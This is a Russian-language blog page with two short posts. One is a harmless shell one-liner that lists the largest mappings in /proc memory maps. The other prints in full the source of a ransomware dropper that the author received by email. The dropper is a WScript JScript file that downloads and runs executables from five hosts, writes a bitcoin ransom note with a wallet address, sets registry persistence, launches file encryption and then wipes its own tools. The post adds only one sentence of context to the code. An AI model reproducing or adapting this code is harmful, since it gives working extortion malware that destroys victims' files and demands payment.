@rion

Тег code в блоге rion

rion

ещё раз про вирт память

cat /proc/31507/maps | tr -s ' ' | cut -d ' ' -f 1,6- | while read -r l; do set $l; range="$1"; shift; path="$@"; set ${range/-/ }; sz=$((16#${2} - 16#${1})); echo $sz "$path"; done | sort -n | tail -n10

66973696
66973696
66973696
67108864 /memfd:pulseaudio (deleted)
67108864 /memfd:pulseaudio (deleted)
67112960 /dev/shm/pulse-shm-3601360319
67112960 /dev/shm/pulse-shm-3811868219
315215872 [heap]
2147483648
274877906944 /home/rion/.local/share/baloo/index

rion

Решил таки посмотреть, что внутри у очередного свалившегося на почту "вируса" и нашел там следующее.

var id = "TWwA8ZOwBDnvZSjlMTObez2-5pGLJFR6ffAJEPGXGNBaBJyZRCIPzYoO5chFy33z_IzmdcW82GUmNUh_x2gpFDct";
var ad = "1N2hKdvStmzixkQDtQWx3meymPdDzhMguf";
var bc = "0.54226";
var ld = 0;
var cq = String.fromCharCode(34);
var cs = String.fromCharCode(92);
var ll = ["aaaaa012.com", "kopenhag.net", "onsite-tech.co.uk", "modestyhijab.com", "xpressionsvt.com"];
var ws = WScript.CreateObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "a";
var pd = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "php4ts.dll";
var xo = WScript.CreateObject("Msxml2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
var fo = WScript.CreateObject("Scripting.FileSystemObject");
if (!fo.FileExists(fn + ".txt")) {
for (var n = 1; n <= 5; n++) {
for (var i = ld; i < ll.length; i++) {
var dn = 0;
try {
xo.open("GET", "http://" + ll[i] + "/counter/?ad=" + ad + "&id=" + id + "&rnd=" + i + n, false);
xo.send();
if (xo.status == 200) {
xa.open();
xa.type = 1;
xa.write(xo.responseBody);
if (xa.size > 1000) {
dn = 1;
if (n <= 2) {
xa.saveToFile(fn + n + ".exe", 2);
try {
ws.Run(fn + n + ".exe", 1, 0);
} catch (er) {};
} else if (n == 3) {
xa.saveToFile(fn + ".exe", 2);
} else if (n == 4) {
xa.saveToFile(pd, 2);
} else if (n == 5) {
xa.saveToFile(fn + ".php", 2);
}
};
xa.close();
};
if (dn == 1) {
ld = i;
break;
};
} catch (er) {};
};
};
if (fo.FileExists(fn + ".exe") && fo.FileExists(pd) && fo.FileExists(fn + ".php")) {
xo.open("GET", "http://" + ll[ld] + "/counter/?ad=" + ad + "&id=" + id + "&st=start", false);
xo.send();
var fp = fo.CreateTextFile(fn + ".txt", true);
fp.WriteLine("ATTENTION!");
fp.WriteLine("");
fp.WriteLine("All your documents, photos, databases and other important personal files");
fp.WriteLine("were encrypted using strong RSA-1024 algorithm with a unique key.");
fp.WriteLine("To restore your files you have to pay " + bc + " BTC (bitcoins).");
fp.WriteLine("Please follow this manual:");
fp.WriteLine("");
fp.WriteLine("1. Create Bitcoin wallet here:");
fp.WriteLine("");
fp.WriteLine(" https://blockchain.info/wallet/new");
fp.WriteLine("");
fp.WriteLine("2. Buy " + bc + " BTC with cash, using search here:");
fp.WriteLine("");
fp.WriteLine(" https://localbitcoins.com/buy_bitcoins");
fp.WriteLine("");
fp.WriteLine("3. Send " + bc + " BTC to this Bitcoin address:");
fp.WriteLine("");
fp.WriteLine(" " + ad);
fp.WriteLine("");
fp.WriteLine("4. Open one of the following links in your browser to download decryptor:");
fp.WriteLine("");
for (var i = 0; i < ll.length; i++) {
fp.WriteLine(" http://" + ll[i] + "/counter/?a=" + ad);
};
fp.WriteLine("");
fp.WriteLine("5. Run decryptor to restore your files.");
fp.WriteLine("");
fp.WriteLine("PLEASE REMEMBER:");
fp.WriteLine("");
fp.WriteLine(" - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.");
fp.WriteLine(" - Nobody can help you except us.");
fp.WriteLine(" - It`s useless to reinstall Windows, update antivirus software, etc.");
fp.WriteLine(" - Your files can be decrypted only after you make payment.");
fp.WriteLine(" - You can find this manual on your desktop (DECRYPT.txt).");
fp.Close();
ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCU" + cs + "SOFTWARE" + cs + "Microsoft" + cs + "Windows" + cs + "CurrentVersion" + cs + "Run" + cq + " /V " + cq + "Crypted" + cq + " /t REG_SZ /F /D " + cq + fn + ".txt" + cq, 0, 0);
ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCR" + cs + ".crypted" + cq + " /ve /t REG_SZ /F /D " + cq + "Crypted" + cq, 0, 0);
ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCR" + cs + "Crypted" + cs + "shell" + cs + "open" + cs + "command" + cq + " /ve /t REG_SZ /F /D " + cq + "notepad.exe " + cs + cq + fn + ".txt" + cs + cq + cq, 0, 0);
ws.Run("%COMSPEC% /c copy /y " + cq + fn + ".txt" + cq + " " + cq + "%AppData%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq, 0, 0);
ws.Run("%COMSPEC% /c copy /y " + cq + fn + ".txt" + cq + " " + cq + "%UserProfile%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq, 0, 0);
ws.Run("%COMSPEC% /c " + fn + ".exe " + cq + fn + ".php" + cq, 0, 1);
ws.Run("%COMSPEC% /c notepad.exe " + cq + fn + ".txt" + cq, 0, 0);
var fp = fo.CreateTextFile(fn + ".php", true);
for (var i = 0; i < 1000; i++) {
fp.WriteLine(ad);
};
fp.Close();
ws.Run("%COMSPEC% /c DEL " + cq + fn + ".php" + cq, 0, 0);
ws.Run("%COMSPEC% /c DEL " + cq + fn + ".exe" + cq, 0, 0);
ws.Run("%COMSPEC% /c DEL " + cq + pd + cq, 0, 0);
xo.open("GET", "http://" + ll[ld] + "/counter/?ad=" + ad + "&id=" + id + "&st=done", false);
xo.send();
};
};

Добавить пост

Вы можете выбрать до 10 файлов общим размером не более 10 МБ.
Для форматирования текста используется Markdown.